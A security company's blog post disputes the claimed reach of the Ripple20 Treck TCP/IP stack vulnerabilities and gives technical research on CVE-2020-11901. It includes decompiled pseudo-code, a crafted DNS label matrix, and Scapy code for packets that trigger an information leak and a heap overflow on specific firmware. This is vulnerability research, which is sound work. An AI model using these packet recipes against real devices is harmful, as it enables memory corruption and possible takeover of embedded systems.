Finite State Blog

The Aftershock of Ripple20 - Finite State

Written by Stephanie | Oct 12, 2020 2:40:15 PM

When the Ripple20 vulnerabilities were announced, Finite State set out to verify their most severe effects in an attempt to address the most critical threats facing our customers and industry partners. During our research process, we were surprised to find that, despite the variations in release date, architecture, and operating system, we had not observed remote code execution vulnerabilities on any of the devices that we had tested aside from the two devices that JSOF demonstrated against. This was particularly concerning in light of JSOF’s assertions that “Ripple20 poses a significant risk from the devices still in use” and that “in all scenarios, an attacker can gain complete control over the targeted device remotely, with no user interaction required.” This leads readers to believe that attackers can develop a universal exploit to target and control “hundreds of millions of devices (or more).” Given the response that we were seeing from the community, we decided to dig deeper into the vulnerabilities and release our findings to better inform our customers and the community at large. 

Since then, we have gained new insights, which we hope will further clarify our approach and provide an even deeper understanding of our results and processes. We will expand upon our findings here in order to provide the greatest transparency and to best serve our community.

Summary of expanded findings:

  • Our research has shown that most devices we tested that utilize the Treck stack are not affected by the disclosed remote code execution vulnerabilities, bringing into question the true widespread impact of Ripple20.
  • Due to variations in compiler options, instruction set, architecture, memory layout, and other configuration settings, an attacker cannot simply develop a universal exploit for all devices affected by Ripple20. Given how significant the variations are across devices, it is highly unlikely that an attacker would even attempt to do so, and to suggest otherwise is both inaccurate and irresponsible. 
  • The likelihood of attackers launching wide scale attacks to exploit Ripple20 vulnerabilities is low, because customized exploits will need to be developed for each device and software version, which would be too costly of an investment.
  • Treck confirmed that exploitation of CVE-2020-11896 was dependent upon an error checking macro being disabled. Almost all vendors had the macro enabled. This further reinforces that many devices are not remotely exploitable.
  • By developing a new approach that was not part of the JSOF disclosure, we were able to demonstrate a heap overflow using CVE-2020-11901, which could provide the opportunity for remote code execution (RCE). This is an update to the initial results described for the HP and Net+OS firmware in our whitepaper. Notably, we demonstrated that the exploitability of CVE-2020-11901 is highly dependent upon the platform, and a unique exploit payload would need to be developed for each target.

Background

Our client base includes both asset owners and device manufacturers who had concerns about Ripple20 and its impact. Our platform can analyze these types of issues in order to ensure that our customers understand exactly how vulnerabilities affect their devices, giving them the information that they need to issue security fixes, if necessary.

We actively investigated these vulnerabilities in order to save our customers time and resources, understanding that attempting to patch the devices that were ostensibly affected could slow down their production and potentially cause more damage.  We focused on CVE-2020-11896 and CVE-2020-11901 because they were the only two Remote Code Execution (RCE) vulnerabilities presented in the JSOF disclosure and had the greatest severity.

We first needed to identify which of our clients’ devices were impacted by Ripple20. Our team at Finite State is focused on performing vulnerability analysis at scale across hundreds of thousands of different embedded devices. Basically, anything we do needs to work across dozens of instruction set architectures, operating systems, and chipsets. That positioned us well to add another detection capability, Focused Emulation, that could reliably test for the actual vulnerable code condition across our entire library of devices.  In that process, we found 20 devices that had the Treck stack embedded within them, and that formed the basis of our research and results.

The whitepaper can be found on our website.

Post Whitepaper Release

We released our whitepaper detailing our findings on September 29, 2020. That paper was developed independently using only black-box testing techniques due to not having access to Treck source code or patches. Since its release, we have had discussions with JSOF, Treck, and our customers, which raised questions that we felt were our duty to address. We conducted additional testing and, in turn, we have a greater understanding of the vulnerabilities and the influence device-level configurations have on the resulting effect.

In discussions with our team, Treck confirmed that exploitation results for CVE-2020-11896 were different based on an error checking macro that vendors could choose to enable or not. Defining the error checking macro enabled the “guard code” that was discussed and depicted in our whitepaper. All devices we’ve encountered, except for the Digi Connect ME 9210, had the guard code. Additionally, another macro could be enabled to support scattered data from the device driver, which completely removes the vulnerable code from the final binary. Thus, we believe CVE-2020-11896 is not nearly as widespread as the initial disclosure implies.

As stated in our original paper, exploitation of CVE-2020-11901 requires DNS to be enabled for the Treck stack. For the firmware that we analyzed, DNS was not enabled and, therefore, the vulnerable code was not present. Even when it was enabled, the Treck DNS code imposed additional constraints which had to be overcome for successful exploitation. Again, the presence, usability, and reachability of the DNS code will vary based on device configurations.

Later in this blog post, we describe the technical details of our expanded findings. We recognize that continuous validation and testing is always necessary. As more public information becomes available, we are willing to reassess our research. Our priority is to ensure that the community at large has the information and tools that they need to address these vulnerabilities in a way that is commensurate with their scope and magnitude.

The Issues We Observed

We agree with JSOF that there are real vulnerabilities that need to be fixed in the Treck stack, and efforts have been made to address them. Treck has been working closely with their customers to help address their affected devices, according to their representatives. They have communicated to their customers the different CVSS ratings that resulted based on certain configurations. Treck has also stated that their patches were tested before being released to their customers. Finite State does not have access to Treck’s source code or patches; therefore, we cannot directly comment on the quality, impact, or effectiveness of their specific patches.

The reporting of these vulnerabilities by JSOF, however, created several issues. First, these vulnerabilities were correlated to a “version” of the Treck stack and reported as such via NVD, ICS CERT, and other vulnerability advisory sources, leading to incorrect assumptions which fueled a misguided community response.

The Treck stack is distributed as source code, giving OEMs the flexibility to modify and select pieces of the code that enable stack functionality. The stack can also target any architecture and device which significantly increases the analysis complexity. This means that the typical, naive approach of searching for a version string or matching a YARA signature to detect the Treck stack will often be incorrect, as sometimes the version string is inaccurate or not even present in the final firmware. Consequently, security teams are required to manually test each device for the possible vulnerability, which is both disruptive and unscalable.

Once the vulnerability was disclosed, it became incumbent upon device manufacturers and software vendors to verify the applicability of the vulnerability. Given the widespread impact of what was reported, it would have been very hard for anyone outside of our team to run this type of large scale analysis. The challenge is that, based on the feedback that we received from our customers, JSOF didn’t provide any tooling for detecting the issue within code or binaries, and the details in their report made it very difficult to test for the vulnerability. As a result, security teams had to develop intricate fixes for the vulnerability on their own to the best of their abilities and/or coordinate with Treck for fixes. Then, they had to ensure that their final device configurations really fixed the problems and didn’t introduce new vulnerabilities. Due to the publicity around this vulnerability and its severity, this needed to be done quickly to ensure their customers felt secure.

Second, JSOF’s disclosure on the Ripple20 website reported that the vulnerable Treck library, and thus the Ripple20 vulnerabilities, “affect hundreds of millions of devices (or more)”. Our research is revealing that the extent of its impact is markedly exaggerated. Given that varying architectures, platforms, and compilers produce different behaviors, exploitation vectors, and resulting effects, it is critical to test each device individually to determine if it is truly vulnerable. It is important for the community at-large to be equipped with the proper information and tooling to verify new vulnerabilities so that they can make informed and appropriate security decisions for their products and organizations. Moreover, it is essential that we are able to quickly and accurately verify these issues across multiple versions of affected devices.

Finally, on their Ripple20 website, JSOF states that “Ripple20 poses a significant risk from the devices still in use” and goes on to claim that “in all scenarios, an attacker can gain complete control over the targeted device remotely, with no user interaction required.” Anyone reading this could easily conclude that attackers can develop a universal exploit to target and control “hundreds of millions of devices (or more),” which is not the case. So far, JSOF has presented two public RCE demonstrations: one on a Schneider Electric APC UPS device and a Digi Connect ME 9210 device. Given the varying configurations and complexities across impacted devices, attackers cannot simply develop a universal exploit to rule them all, and we feel that this is important and responsible to clarify.

The way these issues are framed matters. The likelihood of attackers launching wide scale attacks to exploit Ripple20 vulnerabilities is low because customized exploits will need to be developed for each impacted device and software version. Attackers would need to target each device independently. It’s not that they can’t do that. For many devices running an outdated Treck stack, a determined adversary could find an infiltration point; however, the amount of investment required to exploit the vulnerability is generally not worth the attacker’s time. The widespread impact is further reduced by the proportion of unaffected devices that are running Treck. Marketing Ripple20 as a greater risk than it is without providing an accessible verification method creates undue panic.

The Bottom Line: Don’t Panic

One of the major factors that went into the publication of our whitepaper was the response that we saw with Ripple20—namely, wide-spread patching by third-party vendors without verifying the effects of these vulnerabilities. These vendors attempted to develop patches, sometimes independently from Treck, for all of the devices that were presumed to be affected by this highly publicized vulnerability. We saw two problems: devices that were unaffected were patched unnecessarily, and in at least one case, due to these vendors not adequately verifying their patches, new vulnerabilities were introduced in the process. These unintended consequences are completely avoidable if security teams are able to verify these vulnerabilities before attempting to patch them.

It is important for the disclosing party to realize that they need to serve two audiences: the end users of the devices who may be affected by the vulnerability and the manufacturers of the products who are best armed to fix the problem. For deeply embedded, disruptive vulnerabilities like Ripple20, it would be best for the reporters to release two classes of tools for detecting the vulnerabilities: one for the end users (e.g., a network scanning tool) and one for the manufacturers (e.g., a source code or binary scanning tool). This would ensure that the community has the proper tooling to test and verify without wasting time digging deeply into highly intricate vulnerabilities.

As we emphasized in our whitepaper, the current way that we evaluate and report vulnerabilities is not well suited to IoT and embedded devices. We as a community should be pushing for a better system. We also need to find more scalable ways to verify and respond to reported vulnerabilities, especially high profile vulnerabilities. Manufacturers should be using DevSecOps tools and firmware analysis tools (such as the Finite State Platform) to proactively find vulnerabilities in their first- and third-party code.  When a new vulnerability is reported, they should use those tools to confirm the details of the problem before responding with a generic fix. In the meantime, we need to be doing our due diligence to collectively verify these vulnerabilities and ensure the community has the necessary information and capabilities to do so.

We’ll now dive into the technical details of the additional research that we performed since releasing our whitepaper.

CVE-2020-11901 Vulnerabilities

In JSOF’s white paper and Black Hat presentation on CVE-2020-11901, they detailed three vulnerabilities:

  • Vulnerability #1: Read Out-Of-Bounds (OOB)
  • Vulnerability #2: Integer Overflow
  • Vulnerability #3: Bad RDLENGTH

Finite State’s Focused Emulation solution has implemented detection capabilities for Vulnerability #1 (Read OOB) and #2 (Integer Overflow). We demonstrated its detection capabilities for these vulnerabilities on a multitude of firmwares in our client portfolio. None of these vulnerabilities are present when DNS is disabled in the Treck stack. In our process of verifying these vulnerabilities, we followed JSOF’s CVE-2020-11901 white paper. For completeness, the firmware we evaluated did not contain the bad RDLENGTH variant or memory leak artifact; therefore, Vulnerability #3 and the memory leak artifact were not evaluated during our research due to their absence. Scapy examples have been included for convenience but changes may be necessary depending on your device’s stack.

Vulnerability #1 Read OOB

This Read OOB vulnerability results in an information leak. In the firmware corpus that Finite State tested, the Read OOB existed in two pre-patched firmware which had DNS enabled. The vulnerability lies in the tfDnsLabelToAscii function (Figure 1), used for converting DNS labels to an ASCII string, which does not have proper bounds checking when populating the destination buffer (result variable). DNS packets that do not have a zero byte terminating the exchange label of the DNS MX Record will continuously read beyond the bounds of the packet until it does reach a zero byte (into variable ch). The amount leaked is highly subjective to the contents of memory, as leaked data resembling compression pointers or zero bytes will interrupt the leak. Leaked data from the overread can then be obtained by resolving the MX hostname (Figure 2).

Figure 1: Pseudo-code for tfDnsLabelToAscii

int tfDnsLabelToAscii(char *exchange, char *result, char *pktdata)
{
 char ch;
 uint last_ch;
 uint j = 0;
 uint i = 0;
 uint label_size = 0;
 do {
   ch = exchange[i];
   last_ch = (uint)ch;
   if (ch == 0) {
     result[j] = '\0';
     break;
   }
   if (label_size == 0) {
     if ((ch & 0xc0) == 0) {
       i = i + 1 & 0xffff;
       label_size = last_ch;
       if (j != 0) {
         result[j] = '.';
         j = j + 1 & 0xffff;
       }
     }
     else {
       if (result == NULL) {
         last_ch = 0xde;
         break;
       }
       exchange = pktdata + exchange[i+1] + (last_ch & ~0xc0) * 0x100;
       i = label_size;
     }
     continue;
   }
   result[j] = ch;
   j = j + 1 & 0xffff;
   i = i + 1 & 0xffff;
   label_size = label_size - 1 & 0xff;
 } while( true );

 result[j] = '\0';
 return last_ch;
}

 

Figure 2: Scapy code for the CVE-2020-11901 Information Leak

leak = raw(DNSRRMX(rrname='www.example.com',
   type="MX",
   rdlen=None,
   exchange = b'www.example2.com'))[:-1] + b'\x3f'
full_pkt = IP(src='192.168.1.66', dst='196.168.0.50') / UDP() /
   DNS(opcode="IQUERY", qr=1, aa=1, rd=0, qdcount=0, ancount=1) /
   Raw(leak)

Vulnerability #2 Integer Overflow

In the firmware corpus that we tested, the integer overflow existed in two pre-patched firmware which had DNS enabled. Leveraging this vulnerability, we developed a new approach that was not part of the JSOF disclosure to demonstrate a heap overflow, which can potentially lead to an RCE.

The integer overflow vulnerability lies in how the tfDnsExpLabelLength function pre-parses the label to determine the decompressed size of the label (Figure 4). That label size is then pre-allocated and provided to the tfDnsLabelToAscii function to store the completely decompressed label. Again, following JSOF’s white paper we proceeded to craft a DNS packet that would trigger the integer overflow.

The key element of the DNS packet is the matrix which is what performs the integer overflow. It is an encoded representation of the domain name and an example of one is shown in Figure 3.

Figure 3: Example matrix configuration from JSOF’s BlackHat USA 2020 presentation

We developed a script to arbitrarily generate matrix configurations given the desired matrix size. This script was then used to determine the minimum possible matrix size that still performed the integer overflow while also maximizing space in the DNS packet for the eventual heap overflow exploit payload. Enveloped in the DNS packet with a MX record, we proceeded to throw the malicious packet against the Treck DNS stack in order to observe the results.

Figure 4: MX processing code vulnerable to overflowing labelLength

if (flags == 0xf) {
   if (record_type == 0xf) {
       addr_info = tfDnsAllocAddrInfo();
       if (addr_info != NULL) {
           memcpy(&addr_info->ai_addrlen, resourceRecordAfterNamePtr+10, 2);
           labelLength = tfDnsExpLabelLength(resourceRecordAfterNamePtr+0xc,
                                       dnsHeaderPtr);
           addr_info->ai_canonname = NULL;
           if (labelLength != 0) {
               asciiPtr = tfGetRawBuffer(labelLength);
               addr_info->ai_canonname = asciiPtr;
               if (asciiPtr != NULL) {
                   tfDnsLabelToAscii(resourceRecordAfterNamePtr+0xc,
                               asciiPtr, dnsHeaderPtr);
...

At this point, providing the overflow matrix to tfDnsExpLabelLength truncated the returned length variable, not through an integer overflow but with the bitwise operation (“& 0xFFFF”) which has the same effect. The overflowed amount is allocated using tfGetRawBuffer and the insufficiently sized heap buffer is supposed to be overflown in the subsequent call to tfDnsLabelToAscii. However, we were surprised to observe that the heap overflow did not occur on this firmware as expected.

Note: The following analysis is based on our research and details information that was not present in JSOF’s whitepaper or public presentations

So far we have confirmed that the integer overflow exists; however, the heap overflow was not exercised. The heap overflow didn’t occur because the Treck code limits the DNS packet size to a maximum of 1460 bytes but the 64×19 matrix alone requires 1216 bytes. The remaining 244 bytes in the DNS packet, which is also shared with the header and questions, does not leave us with enough data to overflow the 3510-byte buffer allocated by tfGetRawBuffer. Therefore, successful heap overflow requires modifying the exploitation technique.

The first modification to the technique involved crafting a malicious packet using only one question which contrasts JSOF’s approach of using two. Providing the single question with the matrix in the label resulted in tfDnsLabelLength prematurely exiting when it hits the zero byte on the left side of the matrix. To fix this, we prefixed the matrix with a “jump” byte that forces tfDnsLabelLength to traverse the right side of the matrix and thus bypass the zero byte on the left side. Table 1 illustrates a simple example matrix with the preceding jump byte (in green) in order to bypass traversing the zero byte (in blue).

Table 1: Simple Example Matrix with “jump” byte in green (with offsets for Figure 5)

0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f
  0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f
  0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f
  00 0e 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f
  c0 0d 0d 0e 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f
  c0 0e c0 0f 0b 0c 0d 0e 0f 0f 0f 0f 0f 0f 0f 0f
  c0 10 c0 11 c0 12 c0 13 07 08 09 0a 0b 0c 0d 0e
  c0 14 c0 15 c0 16 c0 17 c0 18 c0 19 c0 1a c0 1b

 

The Scapy code in Figure 5 represents the final DNS packet, with the jump byte ‘\x0f’ used with the simple matrix above. For the overflow matrix, instead use ‘\x3f’ for the jump byte.

Figure 5: Scapy code for the CVE-2020-11901 Integer Overflow (for simple matrix)

dns_pkt = raw(DNS(qr=1, aa=1, rd=1, qdcount=1, ancount=1))
qr_raw = b'\x0f' + matrix_bytes + b'\x00\x05\x00\x01'
an_raw = raw(DNSRRMX(rrname=b'www.example.com',
   exchange=b'\x07payload\xc0\x1c', type="MX"))
full_dns_pkt = Raw(dns_pkt) / Raw(qr_raw) / Raw(an_raw)
full_pkt = IP(src='192.168.1.66', dst='196.168.0.50') /
   UDP() / Raw(full_dns_pkt)

Now we are still confronted with an overflow allocation that is too big. So we have to make another modification to reduce the integer overflow amount. To remedy this, we choose the smallest overflow matrix of size 64×19 and we significantly reduce the overflow amount by strategically inserting another zero byte into the matrix. In the original 64×19 matrix, the zero byte is at location (0, 12) so we inserted another at (4, 12) which resulted in a smaller integer overflow and subsequent tfGetRawBuffer allocation of only 62 bytes. Finally, this causes a heap overflow in tfDnsLabelToAscii of up to 835 bytes for variants that don’t skip non-alpha-numeric and 131 bytes for those that do skip non-alpha-numeric, plus the malicious payload. This heap overflow vulnerability was only present in the two pre-patched firmware which had DNS enabled. In addition to the emulated solution, the heap overflow was also demonstrated on the pre-patched physical Digi hardware.

We revisited CVE-2020-11901 for the HP firmware that we had originally analyzed and presented in our whitepaper. We were able to demonstrate a heap overflow against it based on what we had learned from exploiting the Digi device; however, we needed to craft a DNS packet specific to the HP. The buffer allocated was also 62 bytes but only 193 bytes of alphanumeric characters can be copied over, resulting in a 131-byte overflow which could lead to an RCE. Additional work is required to prove that an RCE effect can be achieved.

Our research illustrates that the vulnerabilities present and their exploitation will vary per device. Exploitation is highly specific to the target, depending upon its architecture, operating system, memory layout, and configurations. For example, although the Schneider UPS, Digi, and HP firmware exhibit the CVE-2020-11901 heap overflow vulnerability, their heap grooming requirements will differ to reliably achieve an RCE. Thus, if exploitation is even possible, then a unique exploit will need to be developed to attack each device affected by Ripple20 vulnerabilities.